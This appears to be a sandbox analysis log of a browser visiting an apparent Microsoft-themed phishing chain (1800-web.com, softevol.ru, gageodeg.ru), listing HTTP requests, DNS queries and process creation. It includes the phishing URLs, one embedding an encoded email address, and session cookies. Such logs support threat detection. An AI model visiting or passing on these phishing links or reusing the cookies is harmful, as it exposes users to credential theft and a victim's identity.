Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fffc2a2e94d0f6c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: a89.softevol.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://a89.softevol.ru/5fsy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZoVUJMbndxd1M4REQ1a25lYXloR0E9PSIsInZhbHVlIjoiMTEzRW1jbWF1NjI1TjhzZWFhTkJzSi9xckhNbzBTQkRxUjRvQTNiM3lkaE1MWmwrRWlzQXZJUFFvSk9sT0hnMXFKbzQycEcvMHNNbmRsZU5sVXVXZGlDcGU0ZUVDN204QUFPMnhCVnZmSlpnSEhvSjZCM2JRb09GTTZBdkdJNWQiLCJtYWMiOiI2ODEzOGQzMmQ2MGQzNThiM2E2YTc0MjZjYzVkOWI0YzFhM2UzYjUwNDRjZjA0MjU4YTY3MjQ1YmEzZDBiMTVhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlUTzM3TW56djRhNEFSK0RRcHZMTUE9PSIsInZhbHVlIjoiWThiMFhGbGpJQlVQeEtZMUxUeHNIeE5VSE5FRWtrSWpzQStUV0NtZHN2a2o5VHYvM3BtekJFek4wUnBlZDY5aU1oYmFlOVRjUmxSbmNaMGE1S0NxeWFFbEZrZk02VS9hS3JrNitFTitNNzZoYkJtaHhkdVhia05xZXdxS2s1MUMiLCJtYWMiOiI0MGQ3ZTljMTczNjMxMWU3MDZjM2UwZDRkM2UxN2VmNTA3ODQ3ZTFkYTViZDlhZDg5YTcwMWExNmI1MjU3ODZkIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fffc2a2e94d0f6c&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fffc2a2e94d0f6c/1736544544923/lbf-aarKlszHGWE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8fffc2a2e94d0f6c/1736544544929/cad4417f5e26610e9e3d5789d1dbb4a5b0d68b624696dd5fe371275521076928/ULoxfGrs8uTzRfH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX HTTP/1.1Host: itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://a89.softevol.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://a89.softevol.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3671221770088554468995aJnxdglUKIEAPHRQJZVOEQDFDAWGIPHZAASEPLGEBBLDIFXAXHTEXGROCEYQWNX HTTP/1.1Host: itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 1800-web.com
Source: global trafficDNS traffic detected: DNS query: a89.softevol.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: itnvwa5tbq14ws3ly2pppdtdoksnnbgetfezemz4dwpiprmseeh9srz.gageodeg.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3198sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnGsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:29:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:29:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 2583Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2Fki3fnwNHqhvJN2WWZF4CvLsUqc%2FdQjsaVfqhMLoUE%2BVGKuBxmpANntayqzTPNDzxT5od6xcgxIHZgrpGu9cdifB7Y6ULH9zMviuQWBsZavNtUJVnllEK1MNLqo%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4885&min_rtt=4449&rtt_var=2048&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2122&delivery_rate=413532&cwnd=251&unsent_bytes=0&cid=e3f9d0b8377d6cfc&ts=25&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8fffc2a9bd091819-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1616&rtt_var=641&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1892&delivery_rate=1806930&cwnd=215&unsent_bytes=0&cid=3e9f724eccb9e848&ts=3902&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:29:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: HQA75AjmDaX1ovJYSG0Kkg==$eeWsZgFReZNBsceCv2wh5w==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8fffc2b8c8d342e1-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_89.2.dr, chromecache_100.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_89.2.dr, chromecache_100.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal56.win@22/76@40/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,14409265588798062167,10844592103582673864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://@1800-web.com/new/auth/6XEcGVvsnjwXq8bbJloqbuPkeuHjc6rLcgYUe/bGVvbi5ncmF2ZXNAYXRvcy5uZXQ="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,14409265588798062167,10844592103582673864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
